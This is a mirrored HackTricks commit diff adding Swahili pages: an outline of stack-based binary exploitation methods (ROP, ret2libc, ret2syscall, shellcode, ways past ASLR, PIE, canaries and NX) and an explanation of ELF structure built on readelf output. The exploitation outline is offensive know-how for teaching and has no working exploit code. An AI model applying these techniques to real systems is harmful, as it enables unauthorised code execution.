Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-16 22:18:27 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['binary-exploitation/basic-stack-binary-exploitation-methodo

Browse source
This commit is contained in:
Translator 2024-06-18 11:44:44 +00:00
parent c559d23784
commit bbd8a85974
6 changed files with 971 additions and 41 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
SUMMARY.md
View file

@ -690,10 +690,10 @@
## 🎯 Binary Exploitation
* [Basic Binary Exploitation Methodology](binary-exploitation/basic-binary-exploitation-methodology/README.md)
* [ELF Basic Information](binary-exploitation/basic-binary-exploitation-methodology/elf-tricks.md)
* [Exploiting Tools](binary-exploitation/basic-binary-exploitation-methodology/tools/README.md)
* [PwnTools](binary-exploitation/basic-binary-exploitation-methodology/tools/pwntools.md)
* [Basic Stack Binary Exploitation Methodology](binary-exploitation/basic-stack-binary-exploitation-methodology/README.md)
* [ELF Basic Information](binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md)
* [Exploiting Tools](binary-exploitation/basic-stack-binary-exploitation-methodology/tools/README.md)
* [PwnTools](binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md)
* [Stack Overflow](binary-exploitation/stack-overflow/README.md)
* [Pointer Redirecting](binary-exploitation/stack-overflow/pointer-redirecting.md)
* [Ret2win](binary-exploitation/stack-overflow/ret2win/README.md)

120
binary-exploitation/basic-stack-binary-exploitation-methodology/README.md Normal file
View file

@ -0,0 +1,120 @@
# Mbinu ya Msingi ya Uchomaji wa Binary
<details>
<summary><strong>Jifunze kuhusu uchomaji wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za uchomaji kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Taarifa Msingi za ELF
Kabla ya kuanza kutumia mbinu yoyote ni muhimu kuelewa sehemu ya muundo wa **binary ya ELF**:
{% content-ref url="elf-tricks.md" %}
[elf-tricks.md](elf-tricks.md)
{% endcontent-ref %}
## Zana za Uchomaji
{% content-ref url="tools/" %}
[zana](tools/)
{% endcontent-ref %}
## Mbinu ya Kujaza Stack
Kwa mbinu nyingi ni vizuri kuwa na mpango ambapo kila mbinu itakuwa na manufaa. Kumbuka kuwa kinga sawa zitaathiri mbinu tofauti. Unaweza kupata njia za kuzidi kinga kwenye kila sehemu ya kinga lakini sio katika mbinu hii.
## Kudhibiti Mwelekeo
Kuna njia tofauti unaweza kumaliza kudhibiti mwelekeo wa programu:
* [**Kujaza Stack**](../stack-overflow/) kwa kubadilisha kiashiria cha kurudi kutoka kwenye stack au EBP -> ESP -> EIP.
* Inaweza kuhitaji kutumia [**Kujaza Nambari**](../integer-overflow.md) kusababisha kujaa
* Au kupitia **Andika Nini Wapi hadi Utekelezaji**
* [**Vidokezo vya Format**](../format-strings/)**:** Tumia `printf` kuandika maudhui yoyote kwenye anwani za aina yoyote.
* [**Uainishaji wa Array**](../array-indexing.md): Tumia uainishaji uliopangwa vibaya kuweza kudhibiti baadhi ya mizunguko na kupata andika ya aina yoyote.
* Inaweza kuhitaji kutumia [**Kujaza Nambari**](../integer-overflow.md) kusababisha kujaa
* **bof hadi WWW kupitia ROP**: Tumia kujaza kijazo cha buffer kujenga ROP na kuweza kupata WWW.
Unaweza kupata mbinu za **Andika Nini Wapi hadi Utekelezaji** katika:
{% content-ref url="../arbitrary-write-2-exec/" %}
[arbitrary-write-2-exec](../arbitrary-write-2-exec/)
{% endcontent-ref %}
## Mzunguko wa Milele
Jambo la kuzingatia ni kwamba kawaida **uchomaji mmoja wa udhaifu huenda usiwe wa kutosha** kutekeleza uchomaji wa mafanikio, hasa baadhi ya kinga zinahitaji kuzidiwa. Kwa hivyo, ni muhimu kujadili chaguzi kadhaa za **kufanya udhaifu mmoja uweze kuchomwa mara kadhaa** katika utekelezaji huo wa binary:
* Andika kwenye mnyororo wa **ROP** anwani ya **`main` function** au kwenye anwani ambapo **udhaifu** unatokea.
* Kwa kudhibiti mnyororo sahihi wa ROP unaweza kutekeleza vitendo vyote katika mnyororo huo
* Andika anwani ya **`exit` kwenye GOT** (au kazi nyingine yoyote inayotumiwa na binary kabla ya kumaliza) anwani ya kurudi **nyuma kwa udhaifu**
* Kama ilivyoelezwa katika [**.fini\_array**](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini\_array.md#eternal-loop)**,** hifadhi hapa 2 kazi, moja kuita tena udhaifu na nyingine kuita**`__libc_csu_fini`** ambayo itaita tena kazi kutoka `.fini_array`.
## Malengo ya Uchomaji
### lengo: Piga simu kwa Kazi Iliyopo
* [**ret2win**](./#ret2win): Kuna kazi katika nambari unayohitaji kupiga simu (labda na baadhi ya parameta maalum) ili kupata bendera.
* Katika bof ya kawaida bila [**PIE**](../common-binary-protections-and-bypasses/pie/) **na** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/) unahitaji tu kuandika anwani kwenye anwani ya kurudi iliyohifadhiwa kwenye stack.
* Katika bof na [**PIE**](../common-binary-protections-and-bypasses/pie/), utahitaji kuzidi kinga hiyo
* Katika bof na [**canary**](../common-binary-protections-and-bypasses/stack-canaries/), utahitaji kuzidi kinga hiyo
* Ikiwa unahitaji kuweka vigezo kadhaa kuita kazi ya **ret2win** kwa usahihi unaweza kutumia:
* Mnyororo wa [**ROP**](./#rop-and-ret2...-techniques) **ikiwa kuna vifaa vya kutosha** kuandaa vigezo vyote
* [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/) (kwa hali unaweza kupiga simu hii ya mfumo) kudhibiti usajili wengi
* Vifaa kutoka [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) na [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) kudhibiti usajili kadhaa
* Kupitia [**Andika Nini Wapi hadi Utekelezaji**](../arbitrary-write-2-exec/) unaweza kutumia udhaifu mwingine (si bof) kuita kazi ya **`win`**.
* [**Kuhamisha Pointi**](../stack-overflow/pointer-redirecting.md): Kwa kesi stack ina pointi kwa kazi itakayoitwa au kwa herufi itakayotumiwa na kazi ya kuvutia (system au printf), inawezekana kubadilisha anwani hiyo.
* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) au [**PIE**](../common-binary-protections-and-bypasses/pie/) inaweza kuathiri anwani.
* [**Vigezo visivyoanzishwa**](../stack-overflow/uninitialized-variables.md): Huwezi kujua.
### lengo: RCE
#### Kupitia shellcode, ikiwa nx imelemazwa au kuchanganya shellcode na ROP:
* [**(Stack) Shellcode**](./#stack-shellcode): Hii ni muhimu kuhifadhi shellcode kwenye stack kabla au baada ya kubadilisha kiashiria cha kurudi na kisha **kuhama kwenda kwake** kuitekeleza:
* **Katika kesi yoyote, ikiwa kuna** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/)**,** katika bof ya kawaida utahitaji kuzidi (kuvuja) hiyo
* **Bila** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **na** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md) inawezekana kuhama kwenye anwani ya stack kwani haitabadilika kamwe
* **Na** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) utahitaji mbinu kama [**ret2esp/ret2reg**](../rop-return-oriented-programing/ret2esp-ret2reg.md) kuhama kwenda kwake
* **Na** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md), utahitaji kutumia baadhi ya [**ROP**](../rop-return-oriented-programing/) **kupiga simu kwa `memprotect`** na kufanya ukurasa fulani uwe `rwx`, ili kisha **hifadhi shellcode hapo** (kupiga simu kwa kusoma kwa mfano) na kisha hama huko.
* Hii itachanganya shellcode na mnyororo wa ROP.
#### Kupitia syscalls
* [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/): Inatumika kuita `execve` ili kukimbia amri za aina yoyote. Unahitaji kuweza kupata **gadgets za kuita syscall maalum na parameta**.
* Ikiwa [**ASLR**](../common-binary-protections-and-bypasses/aslr/) au [**PIE**](../common-binary-protections-and-bypasses/pie/) zimeanzishwa utahitaji kuzishinda **ili kutumia ROP gadgets** kutoka kwa binary au maktaba.
* [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/) inaweza kuwa na manufaa kwa kuandaa **ret2execve**
* Gadgets kutoka [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) na [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) kudhibiti baadhi ya rejista
#### Kupitia libc
* [**Ret2lib**](../rop-return-oriented-programing/ret2lib/): Inatumika kuita kazi kutoka kwa maktaba (kawaida kutoka kwa **`libc`**) kama vile **`system`** na baadhi ya hoja zilizoandaliwa (k.m. `'/bin/sh'`). Unahitaji binary ili **ipakie maktaba** na kazi unayotaka kuita (kawaida libc).
* Ikiwa **imekompiliwa tuli na hakuna** [**PIE**](../common-binary-protections-and-bypasses/pie/), **anwani** ya `system` na `/bin/sh` haitabadilika, hivyo ni rahisi kuzitumia tuli.
* **Bila** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **na kujua toleo la libc** lililopakiwa, **anwani** ya `system` na `/bin/sh` haitabadilika, hivyo ni rahisi kuzitumia tuli.
* Pamoja na [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **lakini bila** [**PIE**](../common-binary-protections-and-bypasses/pie/)**, kujua libc na na binary ikitumia kazi ya `system`** ni rahisi **`ret` kwenye anwani ya system katika GOT** na anwani ya `'/bin/sh'` kwenye parameta (utahitaji kufikiria hili).
* Pamoja na [ASLR](../common-binary-protections-and-bypasses/aslr/) lakini bila [PIE](../common-binary-protections-and-bypasses/pie/), kujua libc na **bila binary kutumia kazi ya `system`** :
* Tumia [**`ret2dlresolve`**](../rop-return-oriented-programing/ret2dlresolve.md) kutatua anwani ya `system` na kuipiga simu&#x20;
* **Zuia** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) na kuhesabu anwani ya `system` na `'/bin/sh'` kwenye kumbukumbu.
* **Pamoja na** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **na** [**PIE**](../common-binary-protections-and-bypasses/pie/) **na bila kujua libc**: Unahitaji:
* Zuia [**PIE**](../common-binary-protections-and-bypasses/pie/)
* Pata **toleo la libc** lililotumika (vuja anwani kadhaa za kazi)
* Angalia **hali za awali za ASLR** ili kuendelea.
#### Kupitia EBP/RBP
* [**Stack Pivoting / EBP2Ret / EBP Chaining**](../stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md): Dhibiti ESP ili kudhibiti RET kupitia EBP iliyohifadhiwa kwenye stack.
* Ina manufaa kwa **kuzidi kidogo** kwa stack overflows
* Ina manufaa kama njia mbadala ya kumaliza kudhibiti EIP wakati wa kutumia EIP kujenga mzigo wa data kwenye kumbukumbu na kisha kuruka kwenda kwake kupitia EBP
#### Mambo Mengine
* [**Pointers Redirecting**](../stack-overflow/pointer-redirecting.md): Kwenye hali stack ina pointa kwa kazi ambayo itaitwa au kwa herufi ambayo itatumika na kazi ya kuvutia (kama vile system au printf), inawezekana kubadilisha anwani hiyo.
* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) au [**PIE**](../common-binary-protections-and-bypasses/pie/) inaweza kuathiri anwani.
* [**Variables zisizowekwa**](../stack-overflow/uninitialized-variables.md): Huwezi kujua

389
binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md Normal file
View file

@ -0,0 +1,389 @@
# Maelezo Muhimu ya ELF
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## Vichwa vya Programu
Hivi hufafanua kwa mzigo jinsi ya kupakia **ELF** kwenye kumbukumbu:
```bash
readelf -lW lnstat
Elf file type is DYN (Position-Independent Executable file)
Entry point 0x1c00
There are 9 program headers, starting at offset 64
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000040 0x0000000000000040 0x0000000000000040 0x0001f8 0x0001f8 R 0x8
INTERP 0x000238 0x0000000000000238 0x0000000000000238 0x00001b 0x00001b R 0x1
[Requesting program interpreter: /lib/ld-linux-aarch64.so.1]
LOAD 0x000000 0x0000000000000000 0x0000000000000000 0x003f7c 0x003f7c R E 0x10000
LOAD 0x00fc48 0x000000000001fc48 0x000000000001fc48 0x000528 0x001190 RW 0x10000
DYNAMIC 0x00fc58 0x000000000001fc58 0x000000000001fc58 0x000200 0x000200 RW 0x8
NOTE 0x000254 0x0000000000000254 0x0000000000000254 0x0000e0 0x0000e0 R 0x4
GNU_EH_FRAME 0x003610 0x0000000000003610 0x0000000000003610 0x0001b4 0x0001b4 R 0x4
GNU_STACK 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW 0x10
GNU_RELRO 0x00fc48 0x000000000001fc48 0x000000000001fc48 0x0003b8 0x0003b8 R 0x1
Section to Segment mapping:
Segment Sections...
00
01 .interp
02 .interp .note.gnu.build-id .note.ABI-tag .note.package .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame
03 .init_array .fini_array .dynamic .got .data .bss
04 .dynamic
05 .note.gnu.build-id .note.ABI-tag .note.package
06 .eh_frame_hdr
07
08 .init_array .fini_array .dynamic .got
```
Programu iliyopita ina **vichwa vya programu 9**, kisha, **upangaji wa sehemu** unaonyesha katika kichwa cha programu gani (kutoka 00 hadi 08) **kila sehemu inapatikana**.
### PHDR - Kichwa cha Programu
Ina meza za vichwa vya programu na metadata yenyewe.
### INTERP
Inaonyesha njia ya loader ya kutumia kusoma faili ya binary kwenye kumbukumbu.
### LOAD
Vichwa hivi hutumiwa kuonyesha **jinsi ya kusoma faili ya binary kwenye kumbukumbu.**\
Kila kichwa cha **LOAD** huonyesha eneo la **kumbukumbu** (ukubwa, ruhusa, na usawazishaji) na inaonyesha baits za **ELF binary za kunakili hapo**.
Kwa mfano, la pili lina ukubwa wa 0x1190, linapaswa kuwa kwenye 0x1fc48 na ruhusa za kusoma na kuandika na litajazwa na 0x528 kutoka kwa offset 0xfc48 (hailazi nafasi yote iliyohifadhiwa). Kumbukumbu hii italeta sehemu `.init_array .fini_array .dynamic .got .data .bss`.
### DYNAMIC
Kichwa hiki husaidia kuunganisha programu na mahitaji yake ya maktaba na kutumia marekebisho. Angalia sehemu ya **`.dynamic`**.
### NOTE
Hii hifadhi habari za metadata za muuzaji kuhusu binary.
### GNU\_EH\_FRAME
Inaainisha eneo la meza za kufungua stack, zinazotumiwa na wachunguzi na kazi za kutunza mizunguko ya C++.
### GNU\_STACK
Ina mazingira ya ulinzi wa kuzuia utekelezaji wa stack. Ikiwa imewezeshwa, binary haitaweza kutekeleza nambari kutoka kwenye stack.
### GNU\_RELRO
Inaonyesha usanidi wa RELRO (Relocation Read-Only) wa binary. Ulinzi huu utaweka sehemu fulani za kumbukumbu kama za kusoma tu (kama `GOT` au meza za `init` na `fini`) baada ya programu kupakiwa na kabla haijaanza kukimbia.
Katika mfano uliopita inaiga baits 0x3b8 hadi 0x1fc48 kama kusoma tu ikigusa sehemu `.init_array .fini_array .dynamic .got .data .bss`.
Tambua kuwa RELRO inaweza kuwa ya sehemu au kamili, toleo la sehemu halilindi sehemu **`.plt.got`**, ambayo hutumiwa kwa **kufunga uvivu** na inahitaji nafasi hii ya kumbukumbu kuwa na **ruhusa za kuandika** kuandika anwani za maktaba mara ya kwanza wanapopatikana.
### TLS
Inaainisha meza ya vipengele vya TLS, ambavyo huhifadhi habari kuhusu pembejeo za mnyororo wa ndani.
## Vichwa vya Sehemu
Vichwa vya sehemu hutoa mtazamo wa kina zaidi wa binary ya ELF.
```
objdump lnstat -h
lnstat: file format elf64-littleaarch64
Sections:
Idx Name Size VMA LMA File off Algn
0 .interp 0000001b 0000000000000238 0000000000000238 00000238 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
1 .note.gnu.build-id 00000024 0000000000000254 0000000000000254 00000254 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
2 .note.ABI-tag 00000020 0000000000000278 0000000000000278 00000278 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
3 .note.package 0000009c 0000000000000298 0000000000000298 00000298 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
4 .gnu.hash 0000001c 0000000000000338 0000000000000338 00000338 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
5 .dynsym 00000498 0000000000000358 0000000000000358 00000358 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
6 .dynstr 000001fe 00000000000007f0 00000000000007f0 000007f0 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
7 .gnu.version 00000062 00000000000009ee 00000000000009ee 000009ee 2**1
CONTENTS, ALLOC, LOAD, READONLY, DATA
8 .gnu.version_r 00000050 0000000000000a50 0000000000000a50 00000a50 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
9 .rela.dyn 00000228 0000000000000aa0 0000000000000aa0 00000aa0 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
10 .rela.plt 000003c0 0000000000000cc8 0000000000000cc8 00000cc8 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
11 .init 00000018 0000000000001088 0000000000001088 00001088 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
12 .plt 000002a0 00000000000010a0 00000000000010a0 000010a0 2**4
CONTENTS, ALLOC, LOAD, READONLY, CODE
13 .text 00001c34 0000000000001340 0000000000001340 00001340 2**6
CONTENTS, ALLOC, LOAD, READONLY, CODE
14 .fini 00000014 0000000000002f74 0000000000002f74 00002f74 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
15 .rodata 00000686 0000000000002f88 0000000000002f88 00002f88 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
16 .eh_frame_hdr 000001b4 0000000000003610 0000000000003610 00003610 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
17 .eh_frame 000007b4 00000000000037c8 00000000000037c8 000037c8 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
18 .init_array 00000008 000000000001fc48 000000000001fc48 0000fc48 2**3
CONTENTS, ALLOC, LOAD, DATA
19 .fini_array 00000008 000000000001fc50 000000000001fc50 0000fc50 2**3
CONTENTS, ALLOC, LOAD, DATA
20 .dynamic 00000200 000000000001fc58 000000000001fc58 0000fc58 2**3
CONTENTS, ALLOC, LOAD, DATA
21 .got 000001a8 000000000001fe58 000000000001fe58 0000fe58 2**3
CONTENTS, ALLOC, LOAD, DATA
22 .data 00000170 0000000000020000 0000000000020000 00010000 2**3
CONTENTS, ALLOC, LOAD, DATA
23 .bss 00000c68 0000000000020170 0000000000020170 00010170 2**3
ALLOC
24 .gnu_debugaltlink 00000049 0000000000000000 0000000000000000 00010170 2**0
CONTENTS, READONLY
25 .gnu_debuglink 00000034 0000000000000000 0000000000000000 000101bc 2**2
CONTENTS, READONLY
```
### Sehemu za Meta
* **Jedwali la String**: Inaleta pamoja strings zote zinazohitajika na faili ya ELF (lakini sio zile zinazotumiwa na programu). Kwa mfano, inaleta majina ya sehemu kama vile `.text` au `.data`. Na kama `.text` iko kwenye offset 45 katika jedwali la strings itatumia nambari **45** katika uga wa **jina**.
* Ili kupata mahali ambapo jedwali la string liko, ELF ina pointer kuelekea jedwali la string.
* **Jedwali la Alama**: Lina habari kuhusu alama kama vile jina (offset katika jedwali la strings), anwani, saizi na metadata zaidi kuhusu alama.
### Sehemu Kuu
* **`.text`**: Maelekezo ya programu ya kukimbia.
* **`.data`**: Variables za kimataifa zenye thamani iliyowekwa wazi katika programu.
* **`.bss`**: Variables za kimataifa zilizoachwa bila kuanzishwa (au kuanzishwa kuwa sifuri). Variables hapa zinaanzishwa moja kwa moja kuwa sifuri hivyo kuzuia sifuri zisizohitajika kuongezwa kwenye binary.
* **`.rodata`**: Variables za kimataifa zenye thamani zisizobadilika (sehemu isiyoweza kusomwa).
* **`.tdata`** na **`.tbss`**: Kama .data na .bss wakati variables za thread-local zinapotumiwa (`__thread_local` katika C++ au `__thread` katika C).
* **`.dynamic`**: Angalia chini.
## Alama
Alama ni eneo lenye jina katika programu ambalo linaweza kuwa function, object la data la kimataifa, variables za thread-local...
```
readelf -s lnstat
Symbol table '.dynsym' contains 49 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND
1: 0000000000001088 0 SECTION LOCAL DEFAULT 12 .init
2: 0000000000020000 0 SECTION LOCAL DEFAULT 23 .data
3: 0000000000000000 0 FUNC GLOBAL DEFAULT UND strtok@GLIBC_2.17 (2)
4: 0000000000000000 0 FUNC GLOBAL DEFAULT UND s[...]@GLIBC_2.17 (2)
5: 0000000000000000 0 FUNC GLOBAL DEFAULT UND strlen@GLIBC_2.17 (2)
6: 0000000000000000 0 FUNC GLOBAL DEFAULT UND fputs@GLIBC_2.17 (2)
7: 0000000000000000 0 FUNC GLOBAL DEFAULT UND exit@GLIBC_2.17 (2)
8: 0000000000000000 0 FUNC GLOBAL DEFAULT UND _[...]@GLIBC_2.34 (3)
9: 0000000000000000 0 FUNC GLOBAL DEFAULT UND perror@GLIBC_2.17 (2)
10: 0000000000000000 0 NOTYPE WEAK DEFAULT UND _ITM_deregisterT[...]
11: 0000000000000000 0 FUNC WEAK DEFAULT UND _[...]@GLIBC_2.17 (2)
12: 0000000000000000 0 FUNC GLOBAL DEFAULT UND putc@GLIBC_2.17 (2)
[...]
```
Kila kuingia ishara ina:
- **Jina**
- **Vipengele vya kufunga** (dhaifu, la ndani au la kawaida): Ishara ya ndani inaweza kupatikana tu na programu yenyewe wakati ishara ya kawaida inashirikiwa nje ya programu. Kitu dhaifu ni kwa mfano kazi inayoweza kubadilishwa na moja tofauti.
- **Aina**: NOTYPE (aina haikufafanuliwa), OBJECT (data kuu ya ulimwengu), FUNC (kazi), SECTION (sehemu), FILE (faili ya msingi ya nambari ya chanzo kwa wachunguzi wa hitilafu), TLS (kigezo cha mada cha mada), GNU\_IFUNC (kazi isiyo ya moja kwa moja kwa ajili ya uhamishaji)
- **Sehemu** ya index ambapo iko
- **Thamani** (anwani kwenye kumbukumbu)
- **Ukubwa**
## Sehemu ya Kudumu
```
readelf -d lnstat
Dynamic section at offset 0xfc58 contains 28 entries:
Tag Type Name/Value
0x0000000000000001 (NEEDED) Shared library: [libc.so.6]
0x0000000000000001 (NEEDED) Shared library: [ld-linux-aarch64.so.1]
0x000000000000000c (INIT) 0x1088
0x000000000000000d (FINI) 0x2f74
0x0000000000000019 (INIT_ARRAY) 0x1fc48
0x000000000000001b (INIT_ARRAYSZ) 8 (bytes)
0x000000000000001a (FINI_ARRAY) 0x1fc50
0x000000000000001c (FINI_ARRAYSZ) 8 (bytes)
0x000000006ffffef5 (GNU_HASH) 0x338
0x0000000000000005 (STRTAB) 0x7f0
0x0000000000000006 (SYMTAB) 0x358
0x000000000000000a (STRSZ) 510 (bytes)
0x000000000000000b (SYMENT) 24 (bytes)
0x0000000000000015 (DEBUG) 0x0
0x0000000000000003 (PLTGOT) 0x1fe58
0x0000000000000002 (PLTRELSZ) 960 (bytes)
0x0000000000000014 (PLTREL) RELA
0x0000000000000017 (JMPREL) 0xcc8
0x0000000000000007 (RELA) 0xaa0
0x0000000000000008 (RELASZ) 552 (bytes)
0x0000000000000009 (RELAENT) 24 (bytes)
0x000000000000001e (FLAGS) BIND_NOW
0x000000006ffffffb (FLAGS_1) Flags: NOW PIE
0x000000006ffffffe (VERNEED) 0xa50
0x000000006fffffff (VERNEEDNUM) 2
0x000000006ffffff0 (VERSYM) 0x9ee
0x000000006ffffff9 (RELACOUNT) 15
0x0000000000000000 (NULL) 0x0
```
The NEEDED directory inaonyesha kwamba programu **inahitaji kupakia maktaba iliyotajwa** ili iendelee. Direktori ya NEEDED inakamilika mara tu maktaba ya pamoja **inapokuwa tayari kikamilifu na inaweza kutumika**.
## Uhamishaji
Mzigo pia lazima uhamishe mahitaji baada ya kuzipakia. Uhamishaji huu unaonyeshwa kwenye meza ya uhamishaji katika muundo wa REL au RELA na idadi ya uhamishaji inatolewa katika sehemu za kudumu RELSZ au RELASZ.
```
readelf -r lnstat
Relocation section '.rela.dyn' at offset 0xaa0 contains 23 entries:
Offset Info Type Sym. Value Sym. Name + Addend
00000001fc48 000000000403 R_AARCH64_RELATIV 1d10
00000001fc50 000000000403 R_AARCH64_RELATIV 1cc0
00000001fff0 000000000403 R_AARCH64_RELATIV 1340
000000020008 000000000403 R_AARCH64_RELATIV 20008
000000020010 000000000403 R_AARCH64_RELATIV 3330
000000020030 000000000403 R_AARCH64_RELATIV 3338
000000020050 000000000403 R_AARCH64_RELATIV 3340
000000020070 000000000403 R_AARCH64_RELATIV 3348
000000020090 000000000403 R_AARCH64_RELATIV 3350
0000000200b0 000000000403 R_AARCH64_RELATIV 3358
0000000200d0 000000000403 R_AARCH64_RELATIV 3360
0000000200f0 000000000403 R_AARCH64_RELATIV 3370
000000020110 000000000403 R_AARCH64_RELATIV 3378
000000020130 000000000403 R_AARCH64_RELATIV 3380
000000020150 000000000403 R_AARCH64_RELATIV 3388
00000001ffb8 000a00000401 R_AARCH64_GLOB_DA 0000000000000000 _ITM_deregisterTM[...] + 0
00000001ffc0 000b00000401 R_AARCH64_GLOB_DA 0000000000000000 __cxa_finalize@GLIBC_2.17 + 0
00000001ffc8 000f00000401 R_AARCH64_GLOB_DA 0000000000000000 stderr@GLIBC_2.17 + 0
00000001ffd0 001000000401 R_AARCH64_GLOB_DA 0000000000000000 optarg@GLIBC_2.17 + 0
00000001ffd8 001400000401 R_AARCH64_GLOB_DA 0000000000000000 stdout@GLIBC_2.17 + 0
00000001ffe0 001e00000401 R_AARCH64_GLOB_DA 0000000000000000 __gmon_start__ + 0
00000001ffe8 001f00000401 R_AARCH64_GLOB_DA 0000000000000000 __stack_chk_guard@GLIBC_2.17 + 0
00000001fff8 002e00000401 R_AARCH64_GLOB_DA 0000000000000000 _ITM_registerTMCl[...] + 0
Relocation section '.rela.plt' at offset 0xcc8 contains 40 entries:
Offset Info Type Sym. Value Sym. Name + Addend
00000001fe70 000300000402 R_AARCH64_JUMP_SL 0000000000000000 strtok@GLIBC_2.17 + 0
00000001fe78 000400000402 R_AARCH64_JUMP_SL 0000000000000000 strtoul@GLIBC_2.17 + 0
00000001fe80 000500000402 R_AARCH64_JUMP_SL 0000000000000000 strlen@GLIBC_2.17 + 0
00000001fe88 000600000402 R_AARCH64_JUMP_SL 0000000000000000 fputs@GLIBC_2.17 + 0
00000001fe90 000700000402 R_AARCH64_JUMP_SL 0000000000000000 exit@GLIBC_2.17 + 0
00000001fe98 000800000402 R_AARCH64_JUMP_SL 0000000000000000 __libc_start_main@GLIBC_2.34 + 0
00000001fea0 000900000402 R_AARCH64_JUMP_SL 0000000000000000 perror@GLIBC_2.17 + 0
00000001fea8 000b00000402 R_AARCH64_JUMP_SL 0000000000000000 __cxa_finalize@GLIBC_2.17 + 0
00000001feb0 000c00000402 R_AARCH64_JUMP_SL 0000000000000000 putc@GLIBC_2.17 + 0
00000001feb8 000d00000402 R_AARCH64_JUMP_SL 0000000000000000 opendir@GLIBC_2.17 + 0
00000001fec0 000e00000402 R_AARCH64_JUMP_SL 0000000000000000 fputc@GLIBC_2.17 + 0
00000001fec8 001100000402 R_AARCH64_JUMP_SL 0000000000000000 snprintf@GLIBC_2.17 + 0
00000001fed0 001200000402 R_AARCH64_JUMP_SL 0000000000000000 __snprintf_chk@GLIBC_2.17 + 0
00000001fed8 001300000402 R_AARCH64_JUMP_SL 0000000000000000 malloc@GLIBC_2.17 + 0
